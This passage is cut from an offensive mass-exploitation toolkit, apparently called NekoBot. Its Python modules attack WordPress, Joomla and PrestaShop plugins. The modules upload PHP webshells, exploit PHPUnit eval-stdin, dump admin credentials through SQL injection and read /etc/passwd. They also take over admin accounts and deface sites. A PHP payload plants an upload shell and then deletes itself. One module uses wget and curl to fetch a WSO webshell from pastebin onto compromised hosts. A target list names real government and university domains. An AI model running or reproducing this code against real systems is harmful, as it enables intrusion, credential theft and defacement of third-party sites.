15 |         "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) "
16 |                       "AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
17 |     }
18 | 
19 | def Exploit(site):
20 |     try:
21 |         vv = site + '/wp-content/plugins/realia/libraries/PayPal-PHP-SDK/vendor/phpunit/phpunit/build.xml'
22 |         Exp = '/wp-content/plugins/realia/libraries/PayPal-PHP-SDK/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
23 |         CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers)
24 |         if 'taskname="phpunit"' in str(CheckVuln.content):
25 |             return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'realia', 'Wordpress')
26 |         else:
27 |             return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit realia', 'Wordpress')
28 |     except:
29 |         return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit realia', 'Wordpress')
30 | 


--------------------------------------------------------------------------------
/Exploits/Wp_enfold_child.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | from Exploits import CVE_2017_9841PHPUnit
 5 | 
 6 | r = '\033[31m'
 7 | g = '\033[32m'
 8 | y = '\033[33m'
 9 | b = '\033[34m'
10 | m = '\033[35m'
11 | c = '\033[36m'
12 | w = '\033[37m'
13 | Headers = {
14 |         "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) "
15 |                       "AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
16 |     }
17 | 
18 | def Exploit(site):
19 |     try:
20 |         vv = site + '/wp-content/themes/enfold-child/update_script/vendor/phpunit/phpunit/build.xml'
21 |         Exp = '/wp-content/themes/enfold-child/update_script/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
22 |         CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers)
23 |         if 'taskname="phpunit"' in str(CheckVuln.content):
24 |             return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'enfold-child', 'Wordpress')
25 |         else:
26 |             return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit enfold-child', 'Wordpress')
27 |     except:
28 |         return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit enfold-child', 'Wordpress')
29 | 


--------------------------------------------------------------------------------
/Exploits/Com_bt_portfolio.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | Headers = {
 6 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
 7 | }
 8 | 
 9 | def Exploit(site):
10 |     try:
11 |         PostFile = {
12 |             'Filedata': open('files/up.php', 'rb')
13 |         }
14 |         requests.post('http://' + site + '/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',
15 |                       files=PostFile, timeout=10, headers=Headers)
16 |         CheckShell = requests.get('http://' + site + '/administrator/components/com_bt_portfolio/up.php',
17 |                                   timeout=10, headers=Headers)
18 |         if 'Vuln!!' in str(CheckShell.content):
19 |             with open('result/Shell_results.txt', 'a') as writer:
20 |                 writer.write(site + '/administrator/components/com_bt_portfolio/up.php' + '\n')
21 |             return printModule.returnYes(site, 'N/A', 'com_bt_portfolio', 'Joomla')
22 |         else:
23 |             return printModule.returnNo(site, 'N/A', 'com_bt_portfolio', 'Joomla')
24 |     except:
25 |         return printModule.returnNo(site, 'N/A', 'com_bt_portfolio', 'Joomla')
26 | 


--------------------------------------------------------------------------------
/Exploits/Wp_dzs_videogallery.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | from Exploits import CVE_2017_9841PHPUnit
 5 | 
 6 | r = '\033[31m'
 7 | g = '\033[32m'
 8 | y = '\033[33m'
 9 | b = '\033[34m'
10 | m = '\033[35m'
11 | c = '\033[36m'
12 | w = '\033[37m'
13 | Headers = {
14 |         "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) "
15 |                       "AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
16 |     }
17 | 
18 | def Exploit(site):
19 |     try:
20 |         vv = site + '/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/build.xml'
21 |         Exp = '/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
22 |         CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers)
23 |         if 'taskname="phpunit"' in str(CheckVuln.content):
24 |             return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'dzs-videogallery', 'Wordpress')
25 |         else:
26 |             return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit dzs-videogallery', 'Wordpress')
27 |     except:
28 |         return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit dzs-videogallery', 'Wordpress')
29 | 


--------------------------------------------------------------------------------
/cms/drupal.txt:
--------------------------------------------------------------------------------
 1 | nursing.duke.edu/
 2 | molpharm.aspetjournals.org/
 3 | cursospaises.campusvirtualsp.org/course/view.php?id=440
 4 | mooc.campusvirtualsp.org/
 5 | jvi.asm.org/
 6 | oag.ca.gov/
 7 | jb.asm.org/
 8 | scholar.pku.edu.cn/
 9 | mooc.campusvirtualsp.org/course/view.php?id=3
10 | jcs.biologists.org/
11 | www.animefillerlist.com/shows/boruto-naruto-next-generations
12 | www.e-education.psu.edu/
13 | www.hollywoodreporter.com/news/twc-warners-imagi-team-anime-151227
14 | www.crnusa.org/
15 | www.industry.gov.au/
16 | www.health.govt.nz/
17 | www.law.cornell.edu/
18 | www.azdeq.gov
19 | www.epa.gov
20 | www.nano.pitt.edu
21 | www.akkreditierungsrat.de
22 | www.apis.ac.uk
23 | molpharm.aspetjournals.org
24 | cursospaises.campusvirtualsp.org
25 | jcs.biologists.org
26 | www.saqa.org.za
27 | molpharm.aspetjournals.org
28 | www.apis.ac.uk
29 | www.akkreditierungsrat.de
30 | molpharm.aspetjournals.org
31 | biological.adelaide.edu.au
32 | www.akkreditierungsrat.de
33 | www.ime.unicamp.br
34 | www.environment.gov.au
35 | www.saqa.org.za
36 | jvi.asm.org
37 | www.nano.pitt.edu
38 | www.apis.ac.uk
39 | cursospaises.campusvirtualsp.org
40 | mooc.campusvirtualsp.org
41 | oag.ca.gov
42 | www.azdeq.gov
43 | www.epa.gov
44 | www.azdeq.gov
45 | scholar.pku.edu.cn
46 | www.nano.pitt.edu
47 | www.epa.gov
48 | www.azdeq.gov
49 | 


--------------------------------------------------------------------------------
/Exploits/Wp_contabileads.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | from Exploits import CVE_2017_9841PHPUnit
 5 | 
 6 | r = '\033[31m'
 7 | g = '\033[32m'
 8 | y = '\033[33m'
 9 | b = '\033[34m'
10 | m = '\033[35m'
11 | c = '\033[36m'
12 | w = '\033[37m'
13 | Headers = {
14 |         "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) "
15 |                       "AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
16 |     }
17 | 
18 | def Exploit(site):
19 |     try:
20 |         vv = site + '/wp-content/plugins/contabileads/integracoes/mautic/api-library/vendor/phpunit/phpunit/build.xml'
21 |         Exp = '/wp-content/plugins/contabileads/integracoes/mautic/api-library/' \
22 |               'vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
23 |         CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers)
24 |         if 'taskname="phpunit"' in str(CheckVuln.content):
25 |             return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'contabileads', 'Wordpress')
26 |         else:
27 |             return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit contabileads', 'Wordpress')
28 |     except:
29 |         return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit contabileads', 'Wordpress')
30 | 


--------------------------------------------------------------------------------
/Exploits/Wpwoocommercesoftware.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import CVE_2017_9841PHPUnit
 4 | from Exploits import printModule
 5 | 
 6 | r = '\033[31m'
 7 | g = '\033[32m'
 8 | y = '\033[33m'
 9 | b = '\033[34m'
10 | m = '\033[35m'
11 | c = '\033[36m'
12 | w = '\033[37m'
13 | Headers = {
14 |         "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) "
15 |                       "AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
16 |     }
17 | 
18 | def Exploit(site):
19 |     try:
20 |         vv = site + '/wp-content/plugins/woocommerce-software-license-manager/vendor/phpunit/phpunit/build.xml'
21 |         Exp = '/wp-content/plugins/woocommerce-software-license-manager/vendor/' \
22 |               'phpunit/phpunit/src/Util/PHP/eval-stdin.php'
23 |         CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers)
24 |         if 'taskname="phpunit"' in str(CheckVuln.content):
25 |             return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'woocommerce-software', 'Wordpress')
26 |         else:
27 |             return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit woocommerce-software', 'Wordpress')
28 |     except:
29 |         return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit woocommerce-software', 'Wordpress')
30 | 


--------------------------------------------------------------------------------
/Exploits/CVE_2017_16562userpro.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | Headers = {
 6 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
 7 | }
 8 | 
 9 | 
10 | def Exploit(site):
11 |     try:
12 |         headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
13 |                    'Accept': '*/*'}
14 |         exploit = '/?up_auto_log=true'
15 |         sess = requests.session()
16 |         sess.get('http://' + site, timeout=10, headers=headers)
17 |         admin_re_page = 'http://' + site + '/wp-admin/'
18 |         sess.get('http://' + site + exploit, timeout=10, headers=headers)
19 |         Check_login = sess.get(admin_re_page, timeout=10, headers=headers)
20 |         if '<li id="wp-admin-bar-logout">' in str(Check_login.content):
21 |             with open('result/AdminTakeover_results.txt', 'a') as writer:
22 |                 writer.write(site + exploit + '\n')
23 |             return printModule.returnYes(site, 'CVE-2017-16562', 'Wordpress Userpro', 'Wordpress')
24 |         else:
25 |             return printModule.returnNo(site, 'CVE-2017-16562', 'Wordpress Userpro', 'Wordpress')
26 |     except:
27 |         return printModule.returnNo(site, 'CVE-2017-16562', 'Wordpress Userpro', 'Wordpress')
28 | 
29 | 


--------------------------------------------------------------------------------
/files/OsComPayLoad.php:
--------------------------------------------------------------------------------
 1 | <title>Hacked By NekoBot</title>
 2 | <?php
 3 | function http_get($url){
 4 | 	$im = curl_init($url);
 5 | 	curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
 6 | 	curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
 7 | 	curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
 8 | 	curl_setopt($im, CURLOPT_HEADER, 0);
 9 | 	return curl_exec($im);
10 | 	curl_close($im);
11 | }
12 | $s = '<title>Hacked By NekoBot</title><?php echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';if( $_POST["_upl"] == "Upload" ) {if(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo "<b>Shell Uploaded ! :)<b><br><br>"; }else { echo "<b>Not uploaded ! </b><br><br>"; }}?>';
13 | $check = $_SERVER['DOCUMENT_ROOT'] . "/neko.php" ;
14 | $text = $s;
15 | $open = fopen($check, 'w');
16 | fwrite($open, $text);
17 | fclose($open);
18 | if(file_exists($check)){
19 |     echo $check."</br>";
20 | }else
21 |   echo "not exits";
22 | echo "done .\n " ;
23 | $check2 = $_SERVER['DOCUMENT_ROOT'] . "/neko.htm" ;
24 | $text2 = 'Hacked By NekoBot';
25 | $open2 = fopen($check2, 'w');
26 | fwrite($open2, $text2);
27 | fclose($open2);
28 | if(file_exists($check2)){
29 |     echo $check2."</br>";
30 | }else
31 |   echo "not exits";
32 | echo "done .\n " ;
33 | @unlink(__FILE__);
34 | ?>
35 | 


--------------------------------------------------------------------------------
/Exploits/wp_miniaudioplayer.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | 
 6 | r = '\033[31m'
 7 | g = '\033[32m'
 8 | y = '\033[33m'
 9 | b = '\033[34m'
10 | m = '\033[35m'
11 | c = '\033[36m'
12 | w = '\033[37m'
13 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
14 | 
15 | 
16 | def Exploit(site):
17 |     try:
18 |         CheckVuln = requests.get('http://' + site, timeout=10, headers=Headers)
19 |         if 'wp-miniaudioplayer' in CheckVuln.content:
20 |             etc = requests.get('http://' + site +
21 |                                '/wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=/etc/passwd',
22 |                                timeout=5, headers=Headers)
23 |             if 'nologin' in etc.content:
24 |                 with open('result/Passwd_file.content', 'a') as writer:
25 |                     writer.write('---------------------------\nSite: ' + site + '\n' + etc.content + '\n')
26 |                 return printModule.returnYes(site, 'N/A', 'wp-miniaudioplayer', 'Wordpress')
27 |             else:
28 |                 return printModule.returnNo(site, 'N/A', 'wp-miniaudioplayer', 'Wordpress')
29 |         else:
30 |             return printModule.returnNo(site, 'N/A', 'wp-miniaudioplayer', 'Wordpress')
31 |     except:
32 |         return printModule.returnNo(site, 'N/A', 'wp-miniaudioplayer', 'Wordpress')
33 | 


--------------------------------------------------------------------------------
/Exploits/Wp_HD_WebPlayer.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | 
 5 | MailPoetZipShell = 'files/rock.zip'
 6 | Headers = {
 7 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
 8 | }
 9 | def Exploit(site):
10 |     try:
11 |         check = requests.get('http://' + site + '/wp-content/plugins/hd-webplayer/playlist.php',
12 |                              timeout=10, headers=Headers)
13 |         if '<?xml version="' in check.content:
14 |             Exploit = '/wp-content/plugins/hd-webplayer/playlist.php' \
15 |                       '?videoid=1+union+select+1,2,concat(user_login,0x3a,user_pass)' \
16 |                       ',4,5,6,7,8,9,10,11+from+wp_users--'
17 |             GoT = requests.get('http://' + site + Exploit, timeout=10, headers=Headers)
18 |             User_Pass = re.findall('<title>(.*)</title>', GoT.content)
19 |             username = User_Pass[1].split(':')[0]
20 |             password = User_Pass[1].split(':')[1]
21 |             with open('result/Sqli_result.txt', 'a') as writer:
22 |                 writer.write('------------------------------\nDomain: ' + str(site) + '\nUsername: ' +
23 |                              str(username) + '\nPassword: ' + str(password) + '\n')
24 |             return printModule.returnYes(site, 'N/A', 'hd-webplayer', 'Wordpress')
25 |         else:
26 |             return printModule.returnNo(site, 'N/A', 'hd-webplayer', 'Wordpress')
27 |     except:
28 |         return printModule.returnNo(site, 'N/A', 'hd-webplayer', 'Wordpress')
29 | 


--------------------------------------------------------------------------------
/Tools/wsoShellUploaderModule.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | 
 3 | SHELL_URL = "https://pastebin.com/raw/dSpsHaiE"
 4 | Headers = {
 5 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
 6 | }
 7 | 
 8 | 
 9 | def UploadWso(EvalShell):
10 |     try:
11 |         evsh = EvalShell
12 |         EvalShell = EvalShell.split("=")[0] + '='
13 |         if 'system' in evsh:
14 |             return 'No'
15 |         else:
16 |             if EvalShell.startswith('http://'):
17 |                 EvalShell = EvalShell.replace('http://', '')
18 |             elif EvalShell.startswith("https://"):
19 |                 EvalShell = EvalShell.replace('https://', '')
20 |             else:
21 |                 pass
22 |             Method1 = 'wget {} -O wso.php'.format(SHELL_URL)
23 |             Method2 = 'curl -O {};mv dSpsHaiE wso2.php'.format(SHELL_URL)
24 |             requests.get('http://{}{};{}'.format(EvalShell, Method1, Method2), timeout=10, headers=Headers)
25 |             shellpath = EvalShell.replace(EvalShell.split('/')[len(EvalShell.split('/')) - 1], '')
26 |             C1 = requests.get('http://{}wso.php'.format(shellpath), timeout=10, headers=Headers)
27 |             C2 = requests.get('http://{}wso2.php'.format(shellpath), timeout=10, headers=Headers)
28 |             if 'WebShellOrb' in str(C1.content):
29 |                 return shellpath + 'wso.php'
30 |             elif 'WebShellOrb' in str(C2.content):
31 |                 return shellpath + 'wso2.php'
32 |             else:
33 |                 return 'No'
34 |     except:
35 |         return 'No'
36 | 
37 | 
38 | 
39 | 


--------------------------------------------------------------------------------
/Exploits/CVE_2019_9978SocialWarfare.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | 
14 | 
15 | 
16 | def Exploit(site):
17 |     try:
18 |         Payload = 'https://pastebin.com/raw/R8JQ6P0Q'
19 |         exp = 'http://{}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={}'.format(site, Payload)
20 |         requests.get(exp, timeout=10, headers=Headers)
21 |         CheckShell = requests.get('http://{}/wp-admin/neko.php'.format(site), timeout=10, headers=Headers)
22 |         CheckIndex = requests.get('http://{}/wp-admin/neko.htm'.format(site), timeout=10, headers=Headers)
23 |         if 'neko!!' in str(CheckIndex.content):
24 |             with open('result/Index_results.txt', 'a') as writer:
25 |                 writer.write('{}/wp-admin/neko.htm\n'.format(site))
26 |             if 'neko!!' in str(CheckShell.content):
27 |                 with open('result/Shell_results.txt', 'a') as writer:
28 |                     writer.write('{}/wp-admin/neko.php?cmd=whoami;);\n'.format(site))
29 |             return printModule.returnYes(site, 'CVE-2019-9978', 'Social Warfare', 'Wordpress')
30 |         else:
31 |             return printModule.returnNo(site, 'CVE-2019-9978', 'Social Warfare', 'Wordpress')
32 |     except:
33 |         return printModule.returnNo(site, 'CVE-2019-9978', 'Social Warfare', 'Wordpress')
34 | 


--------------------------------------------------------------------------------
/Exploits/Presta_videostab.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | Jce_Deface_image = 'files/pwn.gif'
14 | ShellPresta = 'files/up.php'
15 | 
16 | 
17 | def Exploit(site):
18 |     try:
19 |         Exp = site + '/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload'
20 |         Checkvuln = requests.get('http://' + Exp, timeout=5, headers=Headers)
21 |         FileDataIndex = {'qqfile': open(Jce_Deface_image, 'rb')}
22 |         if Checkvuln.status_code == 200:
23 |             requests.post('http://' + Exp, files=FileDataIndex, timeout=5, headers=Headers)
24 |             IndexPath = site + '/modules/videostab/uploads/' + Jce_Deface_image.split('/')[1]
25 |             CheckIndex = requests.get('http://' + IndexPath, timeout=5, headers=Headers)
26 |             if 'GIF89a' in CheckIndex.content:
27 |                 with open('result/Index_results.txt', 'a') as writer:
28 |                     writer.write(IndexPath + '\n')
29 |                 return printModule.returnYes(site, 'N/A', 'videostab Module', 'Prestashop')
30 |             else:
31 |                 return printModule.returnNo(site, 'N/A', 'videostab Module', 'Prestashop')
32 |         else:
33 |             return printModule.returnNo(site, 'N/A', 'videostab Module', 'Prestashop')
34 |     except:
35 |         return printModule.returnNo(site, 'N/A', 'videostab Module', 'Prestashop')
36 | 


--------------------------------------------------------------------------------
/Exploits/cartabandonmentproOld.py:
--------------------------------------------------------------------------------
 1 | 
 2 | import requests, re
 3 | from Exploits import printModule
 4 | r = '\033[31m'
 5 | g = '\033[32m'
 6 | y = '\033[33m'
 7 | b = '\033[34m'
 8 | m = '\033[35m'
 9 | c = '\033[36m'
10 | w = '\033[37m'
11 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
12 | Jce_Deface_image = 'files/pwn.gif'
13 | ShellPresta = 'files/up.php'
14 | 
15 | def Exploit(site):
16 |     try:
17 |         Exp = site + '/modules/cartabandonmentproOld/upload.php'
18 |         Checkvuln = requests.get('http://' + Exp, timeout=5, headers=Headers)
19 |         FileDataIndex = {'image': open(Jce_Deface_image, 'rb')}
20 |         if Checkvuln.status_code == 200:
21 |             requests.post('http://' + Exp, files=FileDataIndex, timeout=5, headers=Headers)
22 |             IndexPath = site + '/modules/cartabandonmentproOld/uploads/' + Jce_Deface_image.split('/')[1]
23 |             CheckIndex = requests.get('http://' + IndexPath, timeout=5, headers=Headers)
24 |             if 'GIF89a' in str(CheckIndex.content):
25 |                 with open('result/Index_results.txt', 'a') as writer:
26 |                     writer.write(IndexPath + '\n')
27 |                 return printModule.returnYes(site, 'N/A', 'CartabandonmentproOld Module', 'Prestashop')
28 |             else:
29 |                 return printModule.returnNo(site, 'N/A', 'CartabandonmentproOld Module', 'Prestashop')
30 |         else:
31 |             return printModule.returnNo(site, 'N/A', 'CartabandonmentproOld Module', 'Prestashop')
32 |     except:
33 |         return printModule.returnNo(site, 'N/A', 'CartabandonmentproOld Module', 'Prestashop')
34 | 


--------------------------------------------------------------------------------
/Exploits/Com_oziogallery.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | from Tools import getSMTP
 5 | from Tools import wsoShellUploaderModule
 6 | 
 7 | payloadshell = '"neko!!<?php {});?>"'.format("system({}".format('$_GET["cmd"]'))
 8 | Headers = {
 9 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
10 | }
11 | 
12 | def Exploit(site):
13 |     try:
14 |         PostData = {'path': '../../../tmp/'}
15 |         fil = {'raw_data': ('neko.php', payloadshell, 'text/html')}
16 |         requests.post('http://' + site + '/components/com_oziogallery/imagin/scripts_ralcr/filesystem'
17 |                                          '/writeToFile.php', files=fil, data=PostData, headers=Headers, timeout=10)
18 |         CheckShell = requests.get('http://' + site + '/tmp/up.php', headers=Headers, timeout=10)
19 |         if 'neko!!' in str(CheckShell.content):
20 |             with open('result/Shell_results.txt', 'a') as writer:
21 |                 writer.write(site + '/tmp/neko.php?cmd=uname -a' + '\n')
22 |             getSMTP.JooomlaSMTPshell(site + '/tmp/neko.php?cmd=id')
23 |             WSo = wsoShellUploaderModule.UploadWso(site + '/tmp/neko.php?cmd=id')
24 |             if WSo == 'No':
25 |                 pass
26 |             else:
27 |                 with open('result/WSo_Shell.txt', 'a') as Wr:
28 |                     Wr.write('{}\n'.format(WSo))
29 |             return printModule.returnYes(site, 'N/A', 'Com_oziogallery', 'Joomla')
30 |         else:
31 |             return printModule.returnNo(site, 'N/A', 'Com_oziogallery', 'Joomla')
32 |     except:
33 |         return printModule.returnNo(site, 'N/A', 'Com_oziogallery', 'Joomla')
34 | 


--------------------------------------------------------------------------------
/Exploits/Com_b2jcontact.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | from Tools import getSMTP
 5 | from Tools import wsoShellUploaderModule
 6 | 
 7 | payloadshell = '"Neko!!<?php {});?>"'.format("system({}".format('$_GET["cmd"]'))
 8 | Headers = {
 9 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
10 | }
11 | 
12 | 
13 | def Exploit(site):
14 |     try:
15 |         requests.post('http://' + site + '/index.php?option=com_b2jcontact&view=loader&type=uploader&'
16 |                                          'owner=component&bid=1&qqfile=/../../../neko.php',
17 |                       data=payloadshell, timeout=10, headers=Headers)
18 |         CheckSh = requests.get('http://' + site +'/components/com_b2jcontact/neko.php', timeout=10, headers=Headers)
19 | 
20 |         if 'neko!!' in str(CheckSh.content):
21 |             with open('result/Shell_results.txt', 'a') as writer:
22 |                 writer.write(site + '/components/com_b2jcontact/neko.php?cmd=uname -a' + '\n')
23 |             getSMTP.JooomlaSMTPshell(site + '/components/com_b2jcontact/neko.php?cmd=id')
24 |             WSo = wsoShellUploaderModule.UploadWso(site + '/components/com_b2jcontact/neko.php?cmd=id')
25 |             if WSo == 'No':
26 |                 pass
27 |             else:
28 |                 with open('result/WSo_Shell.txt', 'a') as Wr:
29 |                     Wr.write('{}\n'.format(WSo))
30 |             return printModule.returnYes(site, 'N/A', 'Com_b2jcontact', 'Joomla')
31 |         else:
32 |             return printModule.returnNo(site, 'N/A', 'Com_b2jcontact', 'Joomla')
33 |     except:
34 |         return printModule.returnNo(site, 'N/A', 'Com_b2jcontact', 'Joomla')
35 | 


--------------------------------------------------------------------------------
/Exploits/CVE_2015_5151_revsliderCSS.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | 
14 | 
15 | def Exploit(site):
16 |     IndeXText = 'neko!! Patch it Now!'
17 |     ency = {'action': "revslider_ajax_action",
18 |             'client_action': "update_captions_css",
19 |             'data': "<body style='color: transparent;background-color: black'><center><h1>"
20 |                     "<b style='color: white'>" + IndeXText + "<p style='color: transparent'>",
21 |             }
22 |     try:
23 |         url = "http://" + site + \
24 |               "/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css"
25 |         aa = requests.post(url, data=ency, timeout=10, headers=Headers)
26 |         if 'succesfully' in str(aa.content):
27 |             deface = site + '/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css'
28 |             X = requests.get('http://' + deface, timeout=10, headers=Headers)
29 |             if 'neko!!' in str(X.content):
30 |                 with open('result/Index_results.txt', 'a') as writer:
31 |                     writer.write(deface + '\n')
32 |             return printModule.returnYes(site, 'CVE-2015-5151', 'Revslider CSS Injection', 'Wordpress')
33 |         else:
34 |             return printModule.returnNo(site, 'CVE-2015-5151', 'Revslider CSS Injection', 'Wordpress')
35 |     except:
36 |         return printModule.returnNo(site, 'CVE-2015-5151', 'Revslider CSS Injection', 'Wordpress')
37 | 


--------------------------------------------------------------------------------
/Exploits/Com_simplephotogallery.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | from Tools import getSMTP
 5 | from Tools import wsoShellUploaderModule
 6 | 
 7 | payloadshell = '"neko!!<?php {});?>"'.format("system({}".format('$_GET["cmd"]'))
 8 | Headers = {
 9 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
10 | }
11 | 
12 | 
13 | def Exploit(site):
14 |     try:
15 |         PostData = {
16 |             'jpath': '..%2F..%2F..%2F..%2Ftmp%2F'
17 |         }
18 |         fil = {'file': ('neko.php.xxxjpg', payloadshell, 'text/html')}
19 |         requests.post('http://' + site + '/administrator/components/com_simplephotogallery/lib/uploadFile.php',
20 |                       data=PostData, files=fil, timeout=10, headers=Headers)
21 |         Exp = requests.get('http://' + site + '/tmp/neko.php.xxxjpg', timeout=10, headers=Headers)
22 |         if 'neko!!' in str(Exp.content):
23 |             with open('result/Shell_results.txt', 'a') as writer:
24 |                 writer.write(site + '/tmp/neko.php.xxxjpg?cmd=uname -a' + '\n')
25 |             getSMTP.JooomlaSMTPshell(site + '/tmp/neko.php.xxxjpg?cmd=id')
26 |             WSo = wsoShellUploaderModule.UploadWso(site + '/tmp/neko.php.xxxjpg?cmd=id')
27 |             if WSo == 'No':
28 |                 pass
29 |             else:
30 |                 with open('result/WSo_Shell.txt', 'a') as Wr:
31 |                     Wr.write('{}\n'.format(WSo))
32 |             return printModule.returnYes(site, 'N/A', 'Com_simplephotogallery', 'Joomla')
33 |         else:
34 |             return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery', 'Joomla')
35 |     except:
36 |         return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery', 'Joomla')
37 | 


--------------------------------------------------------------------------------
/Exploits/Com_Myblog.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | 
 5 | 
 6 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
 7 | r = '\033[31m'
 8 | g = '\033[32m'
 9 | y = '\033[33m'
